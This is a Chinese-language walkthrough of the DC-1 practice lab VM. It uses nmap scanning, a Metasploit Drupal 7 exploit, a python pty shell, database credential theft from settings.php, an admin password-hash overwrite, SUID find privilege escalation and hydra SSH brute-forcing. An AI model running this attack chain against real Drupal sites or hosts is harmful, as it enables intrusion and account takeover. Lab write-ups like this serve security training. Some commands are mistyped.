第一步:使用ifconfig,查看网段所有的主机,可以得到DC1的IP地址192.168.61.130
第二步:寻找靶场真实IP
Nmap -sP 192.168.61.130/24
第三步:信息收集:探端口及服务
nmap -A -p- -v 192.168.61.130
第四步:发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
Search sploit drupal 7
第五步:我们可以利用MSF渗透
Msfconsole 进入MSF控制台
Search 搜索相应模块
Use 对应模块
Show options 查看信息
Set RHOST 远程主机IP
Run 攻击
我们先进入MSF控制台搜索drupal模块,然后进入MSF控制台msfdb run
再去搜索drupal模块search drupal
第六步:选择模块进行测试
用2018测试
第七步:设置靶场IP运行msf
执行whonmi
发现是www-data权限
所以我们先进入home目录,我们发现flag4.txt,提示我们需要提升权限
我们要使用python反弹一个交互式shll
Python -c “import pty;pty.spawn(/bin/bash’)”
显示了当前路径
第八步:我们进入到了DC1的www-data用户下,并在当前目录下发现了flagl.txt,我们查看flagl.txt,得到提示根据提示寻找站点的配置文件
第九步:我们知道Drupal的默认配置文件是/var/www/sites/default/settings.php
然后我们查看文件内容
Cat/var/www/sites/default/settings.php
发现了flag2和数据库的账号密码
flag2提示,提升权限为root来查看敏感文件
第十步:我们可以先进入数据库查看
'username' => 'dbuser',
'password' => 'R0ck3t',
mysql -u dbuser -p
然后查看数据库,我们要切换到drypaldb数据库里面
第十一步:我们要查找默认的Drupal user表select * from users;
我们可以看见admin信息
第十二步:我们需要进入www目录
quit;
要在站点路径下执行
php scripts/password-hash.sh加新密码
第十三步:然后再进入数据库中把密码字段需要进行替换
我们要进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -pR0ck3t
use drupaldb
将pass字段替换掉
update
users
set
pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where
name="admin";
第十四步:登录站点
在web访问站点
进行登录,,密码是我们之前替换掉的,账号是admin
账号是:admin
密码是:123
登录成功
第十五步:find / -perm -4000 2>/dev/null
发现find命令
使用命令测试,发现为root权限
touch 123
Ls
find / -name 123 -exec "whoami" \;
第十六步:我们需要进入john目录cd /usr/share/john
hydra -l flag4 -P password.lst ssh://192.168.61.130